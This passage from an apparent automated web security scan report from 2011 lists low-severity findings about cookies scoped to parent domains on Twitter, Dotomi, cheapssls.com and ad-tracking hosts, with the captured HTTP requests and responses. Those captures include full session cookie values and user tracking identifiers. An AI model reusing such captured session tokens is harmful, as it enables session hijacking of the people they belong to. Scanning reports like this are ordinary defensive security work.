Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 2
Connection: close

[]

10.11. http://api.twitter.com/i/search/video_facets.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/i/search/video_facets.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/search/video_facets.json?q=%23TechCocktailBOS&count=100&include_entities=true HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-51253-25148
X-RateLimit-Limit: 1000
ETag: "d751713988987e9331980363e24189ce"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 927
X-Runtime: 0.01353
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: cf2636f059490d3226454b5ea11f43dae0e606d8
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 2
Connection: close

[]

10.12. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DotomiSession_2304=2_270600892638176047$230900890276886667$2054424934$1315085562782; Domain=.dotomi.com; Path=/
DotomiUser=230900890276886667$0$2054424934; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUFRLZ3hua1xARWZBXAICW0dLSEFdZWBcemhkUH5RIgFAaV0%3D; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
DotomiRR2304=-1$4$1$-1$1$1$; Domain=.dotomi.com; Expires=Sun, 04-Sep-2011 21:32:42 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/ HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:42 GMT
X-Name: dmc-s09
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=230900890276886667$0$2054424934; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
Set-Cookie: DotomiSession_2304=2_270600892638176047$230900890276886667$2054424934$1315085562782; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUFRLZ3hua1xARWZBXAICW0dLSEFdZWBcemhkUH5RIgFAaV0%3D; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
Set-Cookie: DotomiRR2304=-1$4$1$-1$1$1$; Domain=.dotomi.com; Expires=Sun, 04-Sep-2011 21:32:42 GMT; Path=/
Content-Type: text/html
Content-Length: 1573

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

10.13. http://www.cheapssls.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cheapssls.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sess_id=oimsl5irn8eq044otel7tsq8g5; expires=Sat, 17-Sep-2011 21:43:49 GMT; path=/; domain=.cheapssls.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST / HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 3791
Cache-Control: max-age=0
Origin: http://www.cheapssls.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKYQY9kNoc4OMitTj
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.16.9.1315085525172; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

------WebKitFormBoundaryKYQY9kNoc4OMitTj
Content-Disposition: form-data; name="result_ids"

cart_status,wish_list
------WebKitFormBoundaryKYQY9kNoc4OMitTj
Content-Disposition: form-data; name="re
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:43:49 GMT
Location: http://www.cheapssls.com/index.php?dispatch=checkout.cart
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=oimsl5irn8eq044otel7tsq8g5; expires=Sat, 17-Sep-2011 21:43:49 GMT; path=/; domain=.cheapssls.com
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:43:49 GMT
Content-Length: 180

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.cheapssls.com/index.php?dispatch=checkout.cart">here</a></body>

10.14. http://www.cheapssls.com/index.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cheapssls.com
Path:	/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sess_id=tt1a563t87rk9ibbpnpq0ptvm4; expires=Sat, 17-Sep-2011 21:43:50 GMT; path=/; domain=.cheapssls.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?dispatch=checkout.cart HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.16.9.1315085525172; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:43:50 GMT
Location: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=tt1a563t87rk9ibbpnpq0ptvm4; expires=Sat, 17-Sep-2011 21:43:50 GMT; path=/; domain=.cheapssls.com
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:43:49 GMT
Content-Length: 181

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.cheapssls.com/index.php?dispatch=checkout.cart">here</a></body>

10.15. http://adx.adnxs.com/mapuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adx.adnxs.com
Path:	/mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTUxEovuo'X=/ApOr*wE6fP`eZ>X_^MS9msNvwfBdwq+A2^gBD?E`pXV4!Z2YRw'aDH3b-#N8#h5/Q^zP]:QTe<UWK8'A/7kEl85o3j7x!Eu$k697cSk*X.z!-StL_FOb=bj8C1LwIH1jWG_mK:.+0R#^DMqlv9QIFftd[EgzHM^; path=/; expires=Fri, 02-Dec-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESEKgpi49hCX6BTIEggQaw2oU&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WEi'/29uJ21V)`B-9`/7Ko9MUt3xzi'/4ZgI!6aZWx4#ZcXfR=T@A^0Y`4jmC=WN@m!nW>/7tnkB5j%8zT+4q#daaX4Tjg6O#PQRq%^).H=M=x0Xe3#2vn<%BNdgF1+j)nl2fp%0

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTUxEovuo'X=/ApOr*wE6fP`eZ>X_^MS9msNvwfBdwq+A2^gBD?E`pXV4!Z2YRw'aDH3b-#N8#h5/Q^zP]:QTe<UWK8'A/7kEl85o3j7x!Eu$k697cSk*X.z!-StL_FOb=bj8C1LwIH1jWG_mK:.+0R#^DMqlv9QIFftd[EgzHM^; path=/; expires=Fri, 02-Dec-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:41:28 GMT

GIF89a.............!.......,........@..L..;

10.16. http://am.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://am.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

T_7dx8=44%3A1nxhp%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/
rth=2-lpay4l-44~1nxhp~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=41&id=23 HTTP/1.1
Host: am.trafficmp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=SEO000000000W&dtmc_ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&dtmc_loc=http%3A//www.register.com/
Cookie: rth=2-lpay4l-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-44~0~1~1-; uid2=499d34e38-cf7e-49f0-bcb0-ea11d282884d-gquw3zmv; T_i366=ltn%3Axc1f%3A1; T_50nu=ltn%3Axc1g%3A1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 03 Sep 2011 21:56:33 GMT
Connection: close
Set-Cookie: T_i366=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_50nu=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k5bs=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8t18=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3dqj=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gbo2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_hatf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_a6ik=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7ays=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1icy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c1h2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5mlb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bis5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6ovq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_juxr=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4f6f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_j20p=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_97h5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9n5i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gqzz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l42m=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_apfx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_56hy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7ie7=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_kr8s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_eeio=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1cyz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8s6f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5t2t=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ao1w=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jy9u=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_che1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k0ro=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_j6gc=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9qc3=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1jao=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d2cl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_35nq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f15s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_iva8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8j53=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bh8s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6ppb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gdl1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6djq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_40xg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ku6m=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_n5u=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_67pf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6nf8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8nzd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g4f5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ej8q=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f1vi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_540v=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k6pv=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jv4e=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l30v=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k9ng=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ciyg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dw7i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_fpdf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_96ti=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c72l=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_h110=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k9bd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ja6q=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cl47=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_axl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f8zj=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_afn4=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6q6i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_49e=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d73n=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e4a9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bydu=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_h5ls=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_25br=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_aoaw=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g4lf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_798a=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
